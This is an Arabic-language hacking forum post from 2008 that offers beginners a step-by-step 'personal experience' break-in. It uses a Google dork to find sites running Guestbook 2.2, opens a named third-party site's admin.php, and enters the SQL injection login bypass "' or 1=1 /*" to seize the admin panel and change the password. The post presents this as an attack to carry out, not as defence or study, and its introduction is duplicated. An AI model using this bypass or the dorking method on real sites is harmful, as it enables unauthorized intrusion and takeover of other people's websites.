عندما نريد إختراق موقع ما يجب أولا معرفة نقط ضعف هذا الموقع وهومايسمى بالثغرات.ويجب أن نؤمن بأن لكل موقع ثغرة يمكن من خلالها إختراق ذلك الموقع
مهما كانت قوة حمايته.
اليوم سأضع بين أيديكم تجربة شخصية لاختراق موقع بواسطة ثغرة
يمكن تطبيقها حتى لو لم تسمع قط بال* هـــ ـاكر* هـــ ـاكر* هـــ ـاكر أو الإختراق إلخ
عندما نريد إختراق موقع ما يجب أولا معرفة نقط ضعف هذا الموقع وهومايسمى بالثغرات.ويجب أن نؤمن بأن لكل موقع ثغرة يمكن من خلالها إختراق ذلك الموقع
مهما كانت قوة حمايته.
اليوم سأضع بين أيديكم تجربة شخصية لاختراق موقع بواسطة ثغرة Guestbook 2.2
يمكن تطبيقها حتى لو لم تسمع قط بال* هـــ ـاكر* هـــ ـاكر* هـــ ـاكر أو الإختراق إلخ...
أترككم مع الشرح:
اسم الثغره
Guestbook 2.2
ندخل على اى محرك بحث
www.google.comونقوم بالبحث عن inurl:Guestbook 2.2
فيعرض لنا جوجل جميع المواقع المصابة بالثغرة. اخترت هذا الموقع لعمل الشرح عليه
http://orissatravels.com/guestbook/addentry.php الان يبدا الشغل:
الان نروح نضيف بعد رابط الموقع التالي
admin.php
ليصبح الرابط هكذا
http://orissatravels.com/guestbook/admin.phpفيطلب منا القيام بإدخال الإسم والرقم السري فنقوم بالآتي
نضع فى خانه الادمن هذا الكود
كود:
' or 1=1 /*
ونضغط موافق
الان انت داخل لوحة تحكم الادمن
http://orissatravels.com/guestbook/admin.phpيمكنك الآن التحكم في الموقع كيفما تشاء تغير الرقم السري لأدمن مثلا إلخ...
الان اعتبر نفسك قمت بالاختراق
والف الف مبررررررروووووووووووووووك:
لكن لا تفرح كثير
لان هذا الاختراق هو اسهل اختراق بالعالم وامامك الطريق طويل باذن الله لاحتراف ال* هـــ ـاكر* هـــ ـاكر* هـــ ـاكر والاختراق
موضوع: احدث اختراق في العالم 
الأحد يناير 27, 2008 6:23 am